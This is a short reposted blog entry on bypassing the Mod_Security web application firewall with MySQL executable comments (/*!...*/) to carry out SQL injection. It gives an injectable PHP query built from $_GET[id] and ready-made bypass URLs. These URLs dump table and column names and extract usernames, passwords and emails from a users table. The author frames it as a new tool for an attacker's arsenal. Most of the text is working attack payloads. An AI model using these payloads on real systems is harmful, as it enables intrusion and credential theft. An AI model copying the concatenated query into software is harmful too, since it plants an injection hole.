method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.
MySQL servers allow one to use comments of the following type:
/*!sql-code*/ and /*!12345sql-code*/
As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.
As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).
Here is a simple example:
...
$query = "SELECT name FROM table where id = ".$_GET[id];
$result = mysql_query($query);
...
If a web application is protected with Mod_Security, then the following request will be forbidden:
/?id=1+union+select+1
It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (HPP/HPF techniques):
/?id=1+union/*&id=*/select+table_name+from+information_schema.columns
/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns
But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:
/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
Well, one more method to our arsenal :-)
출 처 : http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.htm
